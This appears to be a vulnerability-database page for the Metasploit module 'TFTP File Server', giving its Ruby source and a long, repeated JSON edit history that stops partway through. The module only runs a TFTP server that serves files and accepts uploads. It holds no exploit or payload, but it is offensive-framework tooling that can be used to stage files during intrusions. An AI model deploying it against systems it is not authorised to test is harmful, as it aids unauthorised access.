Search...

TFTP File Server

2010-07-08T23:34:33

ID MSF:AUXILIARY/SERVER/TFTP
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module provides a TFTP service

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/tftp'
require 'tmpdir'

class MetasploitModule &lt; Msf::Auxiliary
  include Msf::Exploit::Remote::TFTPServer
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        =&gt; 'TFTP File Server',
      'Description'    =&gt; %q{
        This module provides a TFTP service
      },
      'Author'      =&gt; [ 'jduck', 'todb' ],
      'License'     =&gt; MSF_LICENSE,
      'Actions'     =&gt;
        [
          [ 'Service' ]
        ],
      'PassiveActions' =&gt;
        [
          'Service'
        ],
      'DefaultAction'  =&gt; 'Service'
    )

    register_options(
      [
        OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
        OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 69 ]),
        OptPath.new('TFTPROOT',   [ true, "The TFTP root directory to serve files from", Dir.tmpdir  ]),
        OptPath.new('OUTPUTPATH', [ true, "The directory in which uploaded files will be written.", Dir.tmpdir ])
      ])
  end

  def srvhost
    datastore['SRVHOST'] || '0.0.0.0'
  end

  def srvport
    datastore['SRVPORT'] || 69
  end

  def run
    print_status("Starting TFTP server on #{srvhost}:#{srvport}...")

    @tftp = Rex::Proto::TFTP::Server.new(
      srvport,
      srvhost,
      {}
    )

    @tftp.set_tftproot(datastore['TFTPROOT'])
    print_status("Files will be served from #{datastore['TFTPROOT']}")

    @tftp.set_output_dir(datastore['OUTPUTPATH'])
    print_status("Uploaded files will be saved in #{datastore['OUTPUTPATH']}")

    # Individual virtual files can be served here -
    #@tftp.register_file("ays", "A" * 2048) # multiple of 512 on purpose

    @tftp.start
    add_socket(@tftp.sock)

    # Wait for finish..
    while @tftp.thread.alive?
      sleep 3
    end

    vprint_status("Stopping TFTP server")
    @tftp.stop
  end
end

JSON Vulners Source

Initial Source

{"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "b8fe7c8a3e2750eaf39bc6a3b3e1991f", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T00:59:47", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/server/tftp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:27:11", "history": [], "viewCount": 2, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-07-02T23:27:11", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/server/tftp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:25:36", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-07-24T19:25:36", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:07", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-08-21T15:32:07", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-19T15:43:52", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-10-19T15:43:52", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-19T23:45:32", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-10-19T23:45:32"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-10-19T23:45:32", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T02:03:00", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T02:03:00"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T02:03:00", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T04:03:34", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T04:03:34"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T04:03:34", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T06:08:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T06:08:04"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T06:08:04", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T22:04:38", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T22:04:38", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-22T05:33:28", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP 